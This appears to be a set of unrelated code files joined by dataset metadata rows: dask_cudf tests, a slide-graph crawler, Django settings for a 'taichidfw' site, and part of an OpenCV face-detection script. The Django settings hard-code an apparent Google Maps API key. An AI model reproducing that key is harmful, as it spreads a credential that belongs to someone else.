gdf = cudf.from_pandas(pdf)
except Exception:
raise pytest.xfail()
# gddf = dd.from_pandas(gdf, npartitions=3, sort=False) # TODO
gddf = dd.from_pandas(gdf, npartitions=3, sort=False)
assert repr(gddf)
if hasattr(pdf, "_repr_html_"):
assert gddf._repr_html_()
@pytest.mark.skip(reason="datetime indexes not fully supported in cudf")
@pytest.mark.parametrize("start", ["1d", "5d", "1w", "12h"])
@pytest.mark.parametrize("stop", ["1d", "3d", "8h"])
def test_repartition_timeseries(start, stop):
# This test is currently absurdly slow. It should not be unskipped without
# slimming it down.
pdf = dask.datasets.timeseries(
"2000-01-01",
"2000-01-31",
freq="1s",
partition_freq=start,
dtypes={"x": int, "y": float},
)
gdf = pdf.map_partitions(cudf.DataFrame.from_pandas)
a = pdf.repartition(freq=stop)
b = gdf.repartition(freq=stop)
assert a.divisions == b.divisions
dd.utils.assert_eq(a, b)
@pytest.mark.parametrize("start", [1, 2, 5])
@pytest.mark.parametrize("stop", [1, 3, 7])
def test_repartition_simple_divisions(start, stop):
pdf = pd.DataFrame({"x": range(100)})
pdf = dd.from_pandas(pdf, npartitions=start)
gdf = pdf.map_partitions(cudf.DataFrame.from_pandas)
a = pdf.repartition(npartitions=stop)
b = gdf.repartition(npartitions=stop)
assert a.divisions == b.divisions
dd.assert_eq(a, b)
@pytest.mark.parametrize("npartitions", [2, 17, 20])
def test_repartition_hash_staged(npartitions):
by = ["b"]
datarange = 35
size = 100
gdf = cudf.DataFrame(
{
"a": np.arange(size, dtype="int64"),
"b": np.random.randint(datarange, size=size),
}
)
# WARNING: Specific npartitions-max_branch combination
# was specifically chosen to cover changes in #4676
npartitions_initial = 17
ddf = dgd.from_cudf(gdf, npartitions=npartitions_initial)
ddf_new = ddf.shuffle(
on=by, ignore_index=True, npartitions=npartitions, max_branch=4
)
# Make sure we are getting a dask_cudf dataframe
assert type(ddf_new) == type(ddf)
# Check that the length was preserved
assert len(ddf_new) == len(ddf)
# Check that the partitions have unique keys,
# and that the key values are preserved
expect_unique = gdf[by].drop_duplicates().sort_values(by)
got_unique = cudf.concat(
[
part[by].compute().drop_duplicates()
for part in ddf_new[by].partitions
],
ignore_index=True,
).sort_values(by)
dd.assert_eq(got_unique, expect_unique, check_index=False)
@pytest.mark.parametrize("by", [["b"], ["c"], ["d"], ["b", "c"]])
@pytest.mark.parametrize("npartitions", [3, 4, 5])
@pytest.mark.parametrize("max_branch", [3, 32])
def test_repartition_hash(by, npartitions, max_branch):
npartitions_i = 4
datarange = 26
size = 100
gdf = cudf.DataFrame(
{
"a": np.arange(0, stop=size, dtype="int64"),
"b": np.random.randint(datarange, size=size),
"c": np.random.choice(list("abcdefgh"), size=size),
"d": np.random.choice(np.arange(26), size=size),
}
)
gdf.d = gdf.d.astype("datetime64[ms]")
ddf = dgd.from_cudf(gdf, npartitions=npartitions_i)
ddf_new = ddf.shuffle(
on=by,
ignore_index=True,
npartitions=npartitions,
max_branch=max_branch,
)
# Check that the length was preserved
assert len(ddf_new) == len(ddf)
# Check that the partitions have unique keys,
# and that the key values are preserved
expect_unique = gdf[by].drop_duplicates().sort_values(by)
got_unique = cudf.concat(
[
part[by].compute().drop_duplicates()
for part in ddf_new[by].partitions
],
ignore_index=True,
).sort_values(by)
dd.assert_eq(got_unique, expect_unique, check_index=False)
@pytest.fixture
def pdf():
return pd.DataFrame(
{"x": [1, 2, 3, 4, 5, 6], "y": [11.0, 12.0, 13.0, 14.0, 15.0, 16.0]}
)
@pytest.fixture
def gdf(pdf):
return cudf.from_pandas(pdf)
@pytest.fixture
def ddf(pdf):
return dd.from_pandas(pdf, npartitions=3)
@pytest.fixture
def gddf(gdf):
return dd.from_pandas(gdf, npartitions=3)
@pytest.mark.parametrize(
"func",
[
lambda df: df + 1,
lambda df: df.index,
lambda df: df.x.sum(),
lambda df: df.x.astype(float),
lambda df: df.assign(z=df.x.astype("int")),
],
)
def test_unary_ops(func, gdf, gddf):
p = func(gdf)
g = func(gddf)
# Fixed in https://github.com/dask/dask/pull/4657
if isinstance(p, cudf.Index):
from packaging import version
if version.parse(dask.__version__) < version.parse("1.1.6"):
pytest.skip(
"dask.dataframe assert_eq index check hardcoded to "
"pandas prior to 1.1.6 release"
)
dd.assert_eq(p, g, check_names=False)
@pytest.mark.parametrize("series", [True, False])
def test_concat(gdf, gddf, series):
if series:
gdf = gdf.x
gddf = gddf.x
a = (
cudf.concat([gdf, gdf + 1, gdf + 2])
.sort_values()
.reset_index(drop=True)
)
b = (
dd.concat([gddf, gddf + 1, gddf + 2], interleave_partitions=True)
.compute()
.sort_values()
.reset_index(drop=True)
)
else:
a = (
cudf.concat([gdf, gdf + 1, gdf + 2])
.sort_values("x")
.reset_index(drop=True)
)
b = (
dd.concat([gddf, gddf + 1, gddf + 2], interleave_partitions=True)
.compute()
.sort_values("x")
.reset_index(drop=True)
)
dd.assert_eq(a, b)
def test_boolean_index(gdf, gddf):
gdf2 = gdf[gdf.x > 2]
gddf2 = gddf[gddf.x > 2]
dd.assert_eq(gdf2, gddf2)
def test_drop(gdf, gddf):
gdf2 = gdf.drop(columns="x")
gddf2 = gddf.drop(columns="x").compute()
dd.assert_eq(gdf2, gddf2)
@pytest.mark.parametrize("deep", [True, False])
@pytest.mark.parametrize("index", [True, False])
def test_memory_usage(gdf, gddf, index, deep):
dd.assert_eq(
gdf.memory_usage(deep=deep, index=index),
gddf.memory_usage(deep=deep, index=index),
)
@pytest.mark.parametrize("index", [True, False])
def test_hash_object_dispatch(index):
obj = cudf.DataFrame(
{"x": ["a", "b", "c"], "y": [1, 2, 3], "z": [1, 1, 0]}, index=[2, 4, 6]
)
# DataFrame
result = dd.core.hash_object_dispatch(obj, index=index)
expected = dgd.backends.hash_object_cudf(obj, index=index)
assert isinstance(result, cudf.Series)
dd.assert_eq(result, expected)
# Series
result = dd.core.hash_object_dispatch(obj["x"], index=index)
expected = dgd.backends.hash_object_cudf(obj["x"], index=index)
assert isinstance(result, cudf.Series)
dd.assert_eq(result, expected)
# DataFrame with MultiIndex
obj_multi = obj.set_index(["x", "z"], drop=True)
result = dd.core.hash_object_dispatch(obj_multi, index=index)
expected = dgd.backends.hash_object_cudf(obj_multi, index=index)
assert isinstance(result, cudf.Series)
dd.assert_eq(result, expected)
@pytest.mark.parametrize(
"index",
[
"int8",
"int32",
"int64",
"float64",
"strings",
"cats",
"time_s",
"time_ms",
"time_ns",
["int32", "int64"],
["int8", "float64", "strings"],
["cats", "int8", "float64"],
["time_ms", "cats"],
],
)
def test_make_meta_backends(index):
dtypes = ["int8", "int32", "int64", "float64"]
df = cudf.DataFrame(
{dt: np.arange(start=0, stop=3, dtype=dt) for dt in dtypes}
)
df["strings"] = ["cat", "dog", "fish"]
df["cats"] = df["strings"].astype("category")
df["time_s"] = np.array(
["2018-10-07", "2018-10-08", "2018-10-09"], dtype="datetime64[s]"
)
df["time_ms"] = df["time_s"].astype("datetime64[ms]")
df["time_ns"] = df["time_s"].astype("datetime64[ns]")
df = df.set_index(index)
# Check "empty" metadata types
chk_meta = dask_make_meta(df)
dd.assert_eq(chk_meta.dtypes, df.dtypes)
# Check "non-empty" metadata types
chk_meta_nonempty = meta_nonempty(df)
dd.assert_eq(chk_meta.dtypes, chk_meta_nonempty.dtypes)
# Check dask code path if not MultiIndex
if not isinstance(df.index, cudf.MultiIndex):
ddf = dgd.from_cudf(df, npartitions=1)
# Check "empty" metadata types
dd.assert_eq(ddf._meta.dtypes, df.dtypes)
# Check "non-empty" metadata types
dd.assert_eq(ddf._meta.dtypes, ddf._meta_nonempty.dtypes)
@pytest.mark.parametrize(
"data",
[
pd.Series([], dtype="float64"),
pd.DataFrame({"abc": [], "xyz": []}),
pd.Series([1, 2, 10, 11]),
pd.DataFrame({"abc": [1, 2, 10, 11], "xyz": [100, 12, 120, 1]}),
],
)
def test_dataframe_series_replace(data):
pdf = data.copy()
gdf = cudf.from_pandas(pdf)
ddf = dgd.from_cudf(gdf, npartitions=5)
dd.assert_eq(ddf.replace(1, 2), pdf.replace(1, 2))
def test_dataframe_assign_col():
df = cudf.DataFrame(list(range(100)))
pdf = pd.DataFrame(list(range(100)))
ddf = dgd.from_cudf(df, npartitions=4)
ddf["fold"] = 0
ddf["fold"] = ddf["fold"].map_partitions(
lambda cudf_df: cp.random.randint(0, 4, len(cudf_df))
)
pddf = dd.from_pandas(pdf, npartitions=4)
pddf["fold"] = 0
pddf["fold"] = pddf["fold"].map_partitions(
lambda p_df: np.random.randint(0, 4, len(p_df))
)
dd.assert_eq(ddf[0], pddf[0])
dd.assert_eq(len(ddf["fold"]), len(pddf["fold"]))
def test_dataframe_set_index():
random.seed(0)
df = cudf.datasets.randomdata(26, dtypes={"a": float, "b": int})
df["str"] = list("abcdefghijklmnopqrstuvwxyz")
pdf = df.to_pandas()
ddf = dgd.from_cudf(df, npartitions=4)
ddf = ddf.set_index("str")
pddf = dd.from_pandas(pdf, npartitions=4)
pddf = pddf.set_index("str")
from cudf.testing._utils import assert_eq
assert_eq(ddf.compute(), pddf.compute())
def test_series_describe():
random.seed(0)
sr = cudf.datasets.randomdata(20)["x"]
psr = sr.to_pandas()
dsr = dgd.from_cudf(sr, npartitions=4)
pdsr = dd.from_pandas(psr, npartitions=4)
dd.assert_eq(
dsr.describe(), pdsr.describe(), check_less_precise=3,
)
def test_dataframe_describe():
random.seed(0)
df = cudf.datasets.randomdata(20)
pdf = df.to_pandas()
ddf = dgd.from_cudf(df, npartitions=4)
pddf = dd.from_pandas(pdf, npartitions=4)
dd.assert_eq(
ddf.describe(), pddf.describe(), check_exact=False, atol=0.0001
)
def test_zero_std_describe():
num = 84886781
df = cudf.DataFrame(
{
"x": np.full((20,), num, dtype=np.float64),
"y": np.full((20,), num, dtype=np.float64),
}
)
pdf = df.to_pandas()
ddf = dgd.from_cudf(df, npartitions=4)
pddf = dd.from_pandas(pdf, npartitions=4)
dd.assert_eq(ddf.describe(), pddf.describe(), check_less_precise=3)
def test_large_numbers_var():
num = 8488678001
df = cudf.DataFrame(
{
"x": np.arange(num, num + 1000, dtype=np.float64),
"y": np.arange(num, num + 1000, dtype=np.float64),
}
)
pdf = df.to_pandas()
ddf = dgd.from_cudf(df, npartitions=4)
pddf = dd.from_pandas(pdf, npartitions=4)
dd.assert_eq(ddf.var(), pddf.var(), check_less_precise=3)
def test_index_map_partitions():
# https://github.com/rapidsai/cudf/issues/6738
ddf = dd.from_pandas(pd.DataFrame({"a": range(10)}), npartitions=2)
mins_pd = ddf.index.map_partitions(M.min, meta=ddf.index).compute()
gddf = dgd.from_cudf(cudf.DataFrame({"a": range(10)}), npartitions=2)
mins_gd = gddf.index.map_partitions(M.min, meta=gddf.index).compute()
dd.assert_eq(mins_pd, mins_gd)
def test_merging_categorical_columns():
try:
from dask.dataframe.dispatch import ( # noqa: F401
union_categoricals_dispatch,
)
except ImportError:
pytest.skip(
"need a version of dask that has union_categoricals_dispatch"
)
df_1 = cudf.DataFrame(
{"id_1": [0, 1, 2, 3], "cat_col": ["a", "b", "f", "f"]}
)
ddf_1 = dgd.from_cudf(df_1, npartitions=2)
ddf_1 = dd.categorical.categorize(ddf_1, columns=["cat_col"])
df_2 = cudf.DataFrame(
{"id_2": [111, 112, 113], "cat_col": ["g", "h", "f"]}
)
ddf_2 = dgd.from_cudf(df_2, npartitions=2)
ddf_2 = dd.categorical.categorize(ddf_2, columns=["cat_col"])
expected = cudf.DataFrame(
{
"id_1": [2, 3],
"cat_col": cudf.Series(
["f", "f"],
dtype=cudf.CategoricalDtype(
categories=["a", "b", "f", "g", "h"], ordered=False
),
),
"id_2": [113, 113],
}
)
dd.assert_eq(ddf_1.merge(ddf_2), expected)
def test_correct_meta():
try:
from dask.dataframe.dispatch import make_meta_obj # noqa: F401
except ImportError:
pytest.skip("need make_meta_obj to be preset")
# Need these local imports in this specific order.
# For context: https://github.com/rapidsai/cudf/issues/7946
import pandas as pd
from dask import dataframe as dd
import dask_cudf # noqa: F401
df = pd.DataFrame({"a": [3, 4], "b": [1, 2]})
ddf = dd.from_pandas(df, npartitions=1)
emb = ddf["a"].apply(pd.Series, meta={"c0": "int64", "c1": "int64"})
assert isinstance(emb, dd.DataFrame)
assert isinstance(emb._meta, pd.DataFrame)
| 28.567696 | 79 | 0.608049 |
ace970546595952b5fcca4a4db24545a9008597d | 6,366 | py | Python | graph.py | dezounet/google_hash_code | 48aa82b8b07eb257c91beeb4201d5c39d103e338 | [
"MIT"
] | null | null | null | graph.py | dezounet/google_hash_code | 48aa82b8b07eb257c91beeb4201d5c39d103e338 | [
"MIT"
] | null | null | null | graph.py | dezounet/google_hash_code | 48aa82b8b07eb257c91beeb4201d5c39d103e338 | [
"MIT"
] | null | null | null | from slide import Slide
from score import transition_score
class Graph(object):
def __init__(self):
self.nodes = {}
self.max_recursion = 4
def set_max_recursion(self, max_recursion):
self.max_recursion = max_recursion
def get_max_recursion(self):
return self.max_recursion
def add_node(self, node):
self.nodes[node.uid] = node
def add_link(self, uid_1, uid_2):
node_1 = self.nodes[uid_1]
node_2 = self.nodes[uid_2]
node_1.add_neighbour(node_2)
def del_link(self, uid_1, uid_2):
node_1 = self.nodes[uid_1]
node_2 = self.nodes[uid_2]
node_1.del_neighbour(node_2)
def remove_node(self, uid):
neighbours_uid = []
for neighbour_uid, neighbour in self.nodes[uid].neighbours.items():
# Do not edit inplace
neighbours_uid.append(neighbour_uid)
for neighbour_uid in neighbours_uid:
self.del_link(uid, neighbour_uid)
self.del_link(neighbour_uid, uid)
def get_best_neighbour(self, uid):
node = self.nodes[uid]
best_neighbour = None
best_neighbour_reachable_nodes = 0
for neighbour_uid, neighbour in node.neighbours.items():
if best_neighbour is None:
best_neighbour = neighbour
best_neighbour_reachable_nodes = self.get_reachable_node(best_neighbour.node.uid)
elif len(neighbour.node.neighbours) == 2:
# If a neighbour only has another neighbour, do not leave him alone!
best_neighbour = neighbour
break
elif len(self.get_reachable_node(neighbour.node.uid)) > len(
best_neighbour_reachable_nodes):
best_neighbour = neighbour
best_neighbour_reachable_nodes = self.get_reachable_node(best_neighbour.node.uid)
if best_neighbour is not None:
best_neighbour = best_neighbour.node.uid
return best_neighbour
def get_reachable_node(self, uid, max_recursion=None, ignored_nodes=None):
reachable_nodes = set()
if max_recursion is None:
max_recursion = self.get_max_recursion()
if ignored_nodes is None:
ignored_nodes = set()
starting_node = self.nodes[uid]
reachable_nodes.add(starting_node)
ignored_nodes.add(starting_node)
if max_recursion <= 0:
return reachable_nodes
for neighbour_uid, neighbour in starting_node.neighbours.items():
if neighbour_uid in ignored_nodes:
continue
else:
reachable_nodes |= self.get_reachable_node(neighbour_uid,
max_recursion=(max_recursion - 1),
ignored_nodes=ignored_nodes)
return reachable_nodes
def break_links(self, filter_fn):
links_to_del = []
for node_uid, node in self.nodes.items():
for neighbour_uid, neighbour in node.neighbours.items():
if not filter_fn(node, neighbour):
links_to_del.append((node_uid, neighbour_uid))
for node_uid, neighbour_uid in links_to_del:
self.del_link(node_uid, neighbour_uid)
def count_links(self):
link_count = 0
for node_uid, node in self.nodes.items():
link_count += len(node.neighbours)
return link_count
def clean_dead_end(self):
dead_end = []
for uid, node in self.nodes.items():
if len(node.neighbours) == 1:
dead_end.append(uid)
for uid in dead_end:
self.remove_node(uid)
class Node(object):
    """A graph vertex wrapping a slide, identified by uid."""

    def __init__(self, uid, slide):
        self.uid = uid
        self._slide = slide
        self.neighbours = {}  # neighbour uid -> Neighbour edge

    def get_slide(self):
        """Return the slide held by this node."""
        return self._slide

    def add_neighbour(self, node):
        """Link to `node`, scoring the transition; no-op if already linked."""
        if node.uid in self.neighbours:
            return
        self.neighbours[node.uid] = Neighbour(self, node)

    def del_neighbour(self, node):
        """Drop the link to `node` if present; silently ignore otherwise."""
        self.neighbours.pop(node.uid, None)
class Neighbour(object):
    """Directed edge wrapper: the target node plus a transition weight."""

    def __init__(self, current_node, neighbour_node):
        self.node = neighbour_node
        # Score of showing neighbour_node's slide right after current_node's.
        self.weight = transition_score(current_node.get_slide(), neighbour_node.get_slide())
def build_graph(pics, pics_per_tag):
    """Build the slide graph from pictures.

    One node (wrapping a single-picture slide) is created per picture,
    and a directed link is added between every ordered pair of distinct
    pictures that share a tag.
    """
    graph = Graph()

    # One node per picture.
    for uid, pic in pics.items():
        graph.add_node(Node(uid, Slide(pic)))

    # Pictures sharing a tag may follow each other in the show.
    for tag_pics in pics_per_tag.values():
        for pic_id_1 in tag_pics:
            first = pics[pic_id_1]
            for pic_id_2 in tag_pics:
                if pic_id_2 == pic_id_1:
                    continue
                graph.add_link(first.id, pics[pic_id_2].id)
    return graph
def crawl_graph(graph, starting_node_uid, recursion_strategy=None):
    """Greedily walk `graph` from `starting_node_uid` and return the path.

    Parameters
    ----------
    graph : Graph
        Graph to crawl; visited nodes are detached via remove_node so the
        walk never revisits them.
    starting_node_uid : hashable
        uid of the first node of the path.
    recursion_strategy : dict, optional
        Maps a step index to the look-ahead depth to switch to at that
        step (applied via graph.set_max_recursion).

    Returns
    -------
    list
        The uids of the visited nodes, in order.

    Note: a dead debug dump (a Counter over all neighbour counts, rebuilt
    every 2000 steps and never used) was removed; the progress print is
    kept.
    """
    if recursion_strategy is None:
        # Historical tuning table: depth per step milestone (currently flat).
        recursion_strategy = {
            0: 4,
            5000: 4,
            15000: 4,
            20000: 4,
            25000: 4,
            30000: 4,
            35000: 4,
            40000: 4,
            45000: 4,
        }

    path = [starting_node_uid]
    current_node_uid = starting_node_uid
    step = 0
    while True:
        if step % 2000 == 0 and step != 0:
            print('looking for node %s' % step)

        # Update the look-ahead depth when a milestone is reached.
        if step in recursion_strategy:
            graph.set_max_recursion(recursion_strategy[step])

        next_node_uid = graph.get_best_neighbour(current_node_uid)
        if next_node_uid is None:
            break

        # Cannot move backward to selected node
        graph.remove_node(current_node_uid)
        current_node_uid = next_node_uid
        path.append(current_node_uid)
        step += 1
    return path
| 29.201835 | 103 | 0.593622 |
ace97077b350da460412bcfd236fc35fb85cdf08 | 11,187 | py | Python | config/settings/base.py | bchip50/taichidfw | 238713c04e0bfc010d5994a380a6c34d1926d0f5 | [
"MIT"
] | null | null | null | config/settings/base.py | bchip50/taichidfw | 238713c04e0bfc010d5994a380a6c34d1926d0f5 | [
"MIT"
] | null | null | null | config/settings/base.py | bchip50/taichidfw | 238713c04e0bfc010d5994a380a6c34d1926d0f5 | [
"MIT"
] | null | null | null | """
Base settings to build other settings files upon.
"""
from pathlib import Path
import environ
ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent.parent
# taichidfw/
APPS_DIR = ROOT_DIR / "taichidfw"
env = environ.Env()
READ_DOT_ENV_FILE = env.bool("DJANGO_READ_DOT_ENV_FILE", default=True)
if READ_DOT_ENV_FILE:
# OS environment variables take precedence over variables from .env
env.read_env(str(ROOT_DIR / ".env"))
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# Local time zone. Choices are
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# though not all of them may be available with every OS.
# In Windows, this must be set to your system time zone.
TIME_ZONE = "America/Chicago"
# https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = "en-us"
# https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# https://docs.djangoproject.com/en/dev/ref/settings/#locale-paths
LOCALE_PATHS = [str(ROOT_DIR / "locale")]
# DATABASES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
"default": env.db("DATABASE_URL", default="postgres:///taichidfw"),
}
DATABASES["default"]["ATOMIC_REQUESTS"] = True
# https://docs.djangoproject.com/en/stable/ref/settings/#std:setting-DEFAULT_AUTO_FIELD
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
# URLS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = "config.urls"
# https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = "config.wsgi.application"
# APPS
# ------------------------------------------------------------------------------
DJANGO_APPS = [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.messages",
"django.contrib.staticfiles",
# "django.contrib.humanize", # Handy template tags
"django.contrib.admin",
"django.forms",
"phone_field",
"django_google_maps",
"taggit",
"taggit_templatetags2",
]
THIRD_PARTY_APPS = [
"crispy_forms",
"crispy_bootstrap5",
"allauth",
"allauth.account",
"allauth.socialaccount",
]
LOCAL_APPS = [
"taichidfw.users",
"taichidfw.locations",
"taichidfw.resources",
"taichidfw.styles",
# Your stuff: custom apps go here
]
# https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIGRATIONS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#migration-modules
MIGRATION_MODULES = {"sites": "taichidfw.contrib.sites.migrations"}
# AUTHENTICATION
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-user-model
AUTH_USER_MODEL = "users.User"
# https://docs.djangoproject.com/en/dev/ref/settings/#login-redirect-url
LOGIN_REDIRECT_URL = "users:redirect"
# https://docs.djangoproject.com/en/dev/ref/settings/#login-url
LOGIN_URL = "account_login"
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = [
# https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django
"django.contrib.auth.hashers.Argon2PasswordHasher",
"django.contrib.auth.hashers.PBKDF2PasswordHasher",
"django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher",
"django.contrib.auth.hashers.BCryptSHA256PasswordHasher",
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#middleware
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"whitenoise.middleware.WhiteNoiseMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.common.BrokenLinkEmailsMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR / "staticfiles")
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = "/static/"
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [str(APPS_DIR / "static")]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR / "media")
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = "/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
"BACKEND": "django.template.backends.django.DjangoTemplates",
# https://docs.djangoproject.com/en/dev/ref/settings/#dirs
"DIRS": [str(APPS_DIR / "templates")],
# https://docs.djangoproject.com/en/dev/ref/settings/#app-dirs
"APP_DIRS": True,
"OPTIONS": {
# https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"taichidfw.users.context_processors.allauth_settings",
],
},
}
]
# https://docs.djangoproject.com/en/dev/ref/settings/#form-renderer
FORM_RENDERER = "django.forms.renderers.TemplatesSetting"
# http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = "bootstrap5"
CRISPY_ALLOWED_TEMPLATE_PACKS = "bootstrap5"
# FIXTURES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#fixture-dirs
FIXTURE_DIRS = (str(APPS_DIR / "fixtures"),)
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-httponly
SESSION_COOKIE_HTTPONLY = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-httponly
CSRF_COOKIE_HTTPONLY = True
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-browser-xss-filter
SECURE_BROWSER_XSS_FILTER = True
# https://docs.djangoproject.com/en/dev/ref/settings/#x-frame-options
X_FRAME_OPTIONS = "DENY"
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = env(
"DJANGO_EMAIL_BACKEND",
default="django.core.mail.backends.smtp.EmailBackend",
)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-timeout
EMAIL_TIMEOUT = 5
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL.
ADMIN_URL = "admin/"
# https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = [("""William D Chipman""", "bill@chipmaninfo.com")]
# https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
}
},
"root": {"level": "INFO", "handlers": ["console"]},
}
# django-allauth
# ------------------------------------------------------------------------------
ACCOUNT_ALLOW_REGISTRATION = env.bool("DJANGO_ACCOUNT_ALLOW_REGISTRATION", True)
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_AUTHENTICATION_METHOD = "username"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_EMAIL_REQUIRED = True
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_ADAPTER = "taichidfw.users.adapters.AccountAdapter"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
SOCIALACCOUNT_ADAPTER = "taichidfw.users.adapters.SocialAccountAdapter"
# Your stuff...
# ------------------------------------------------------------------------------
GOOGLE_MAPS_API_KEY = "AIzaSyBLDpTM3c50sCj3Pw4Yo7Giju-adzTBbbE"
| 39.670213 | 93 | 0.637436 |
ace971367291d8e5e0522f781af9688ce461440b | 1,530 | py | Python | FaceDetection/ManualDetect.py | imkiller32/ImageProcessing-Finding-Particles- | 4ac4d801203737e27429d102421435ac874d533b | [
"MIT"
] | null | null | null | FaceDetection/ManualDetect.py | imkiller32/ImageProcessing-Finding-Particles- | 4ac4d801203737e27429d102421435ac874d533b | [
"MIT"
] | null | null | null | FaceDetection/ManualDetect.py | imkiller32/ImageProcessing-Finding-Particles- | 4ac4d801203737e27429d102421435ac874d533b | [
"MIT"
] | 1 | 2019-10-07T18:53:37.000Z | 2019-10-07T18:53:37.000Z | #This uses a video loaded from some directory ..You can specify your own path
#----------------------------------------#
#FACE DETECTION USING PYTHON3 AND OPENCV #
#--------AUTHOR- Ritesh Aggarwal---------#
#-----------Language->Python3------------#
#-----------Github:->imkiller32----------#
#---------Enjoy Your DETECTION-----------#
#importing useful library
import cv2
#import numpy as np
def main(video_path=r"E:\FILES\motivational\ABC.mp4"):
    """Run Haar-cascade face detection over a video and draw boxes on faces.

    Parameters
    ----------
    video_path : str, optional
        Path of the video file to analyse.  Defaults to the original
        hard-coded sample so existing callers keep working.

    Press ESC in the display window to quit early.
    """
    # NOTE(review): hard-coded classifier location is machine-specific;
    # cv2.data.haarcascades would be portable -- confirm the installed
    # OpenCV build exposes it before switching.
    path = "C:\\Users\\imkiller\\AppData\\Local\\Programs\\Python\\Python36-32\\Lib\\site-packages\\cv2\\data\\"
    classifier_path = path + "haarcascade_frontalface_default.xml"
